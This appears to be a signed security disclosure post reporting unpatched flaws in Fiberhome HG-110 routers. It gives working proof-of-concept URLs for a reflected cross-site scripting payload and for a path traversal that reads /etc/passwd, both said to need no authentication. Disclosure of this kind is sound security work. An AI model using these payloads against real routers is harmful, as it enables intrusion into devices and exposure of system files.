-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I found two vulnerabilities on fiberhome hg-110 routers[1] and has not
been reported nor fixed.

XSS:
- -
http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal:

- -
http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

URLs are accessible without authentication.

Device info:

- - HardwareVersion :	HG110_BH_R1A

- - SoftwareVersion :	HG110_BH_V1.6

- - Firmware Version :	1.0.0


This vulnerabilities can affect to other version and models of this vendor.


[1] http://www.minuevohogar.cl/wp-content/uploads/2011/03/Imagen-8.png
- -- 
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@jabberes.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk2fDfwACgkQIP17Kywx9JSPbwCfXNQs42kMMPcUiw5107MnABJ0
PcUAniDsC0MZplJNquS0mXCtpidLk32r
=UZbN
-----END PGP SIGNATURE-----